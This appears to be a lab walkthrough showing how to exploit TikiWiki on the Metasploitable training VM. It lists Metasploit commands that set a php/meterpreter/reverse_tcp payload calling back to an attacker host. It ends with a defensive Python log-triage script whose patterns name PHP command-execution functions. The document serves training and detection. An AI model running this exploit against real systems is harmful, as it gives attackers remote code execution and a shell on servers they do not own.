Exploiting Tikiwiki using Metasploit Framework

Metasploitable is an Ubuntu 8.04 server install on a VMware 6.5 image. It ships with a number of vulnerable packages, including an install of Tomcat 5.5 (with weak credentials), distcc, TikiWiki, TWiki, and an older MySQL.

You can download the box here.

When scanning the box with Nikto, the output reveals that the CMS version has a vulnerability that allows remote PHP code execution. We’re going to use Metasploit to run the exploit.

TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code.

Fire up msfconsole. Let’s see whether it has modules for TikiWiki.

search tikiwiki

Indeed, it does. Quite a few of them.

Select the exploit exploit/unix/webapp/tikiwiki_graph_formula_exec with the use command, passing the index shown next to the module in the search results:

use index_of_the_module

You can see the payload options with the command options. In order to run the exploit, we have to set the IP of the remote host (Metasploitable 1), the IP of the attacking machine, the listening port and a payload compatible with the specific environment. All these options can be set with the following commands:

set RHOST target_ip_address

set LHOST attacker_ip_address

set LPORT attacker_listening_port

set PAYLOAD php/meterpreter/reverse_tcp

(php/meterpreter/reverse_tcp is the default payload of this module.)

After the exploit runs, we have a Meterpreter shell.
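From the defender's side, the sequence above (a Nikto scan followed by a request that carries PHP code) is visible in the web server's access log. The following is an added example, not part of the original post: it assumes Apache "combined" log lines, and the IP addresses, the script name example.php and the list of PHP function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" access-log format (assumption about the server's logging).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Heuristic list (assumption): PHP calls that should never appear in a wiki URL.
PHP_CALL_RE = re.compile(
    r'\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|'
    r'phpinfo|base64_decode|create_function)\s*\(', re.IGNORECASE)

def triage(lines):
    """Map each client IP to what it did: scanner UA seen, PHP code in URLs."""
    clients = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        rec = clients.setdefault(m["ip"], {"scanner": False, "php_in_url": []})
        if "nikto" in m["ua"].lower():  # Nikto's default User-Agent names itself
            rec["scanner"] = True
        # Decode twice so double URL-encoding does not hide the call.
        decoded = unquote_plus(unquote_plus(m["target"]))
        if PHP_CALL_RE.search(decoded):
            rec["php_in_url"].append(m["target"])
    return clients

def high_priority(clients):
    """Clients that both used a scanner User-Agent and sent PHP code in a URL."""
    return sorted(ip for ip, r in clients.items()
                  if r["scanner"] and r["php_in_url"])

# Constructed sample lines (documentation IPs, placeholder script name).
SAMPLE = [
    '192.0.2.10 - - [10/Jan/2024:10:00:01 +0000] "GET /tikiwiki/ HTTP/1.1" 200 512 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"',
    '192.0.2.10 - - [10/Jan/2024:10:05:42 +0000] "GET /tikiwiki/example.php?v=phpinfo%28%29 HTTP/1.1" 200 1024 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '198.51.100.7 - - [10/Jan/2024:10:06:00 +0000] "GET /tikiwiki/example.php?page=HomePage HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2024:10:07:13 +0000] "GET /tikiwiki/example.php?v=system%2528%2529 HTTP/1.1" 200 300 "-" "curl/8.0"',
]

if __name__ == "__main__":
    result = triage(SAMPLE)
    for ip in high_priority(result):
        print(ip, result[ip]["php_in_url"])
```

A client that only matches the PHP-call heuristic (203.0.113.5 in the sample) is still worth reviewing; the scanner correlation only raises its priority.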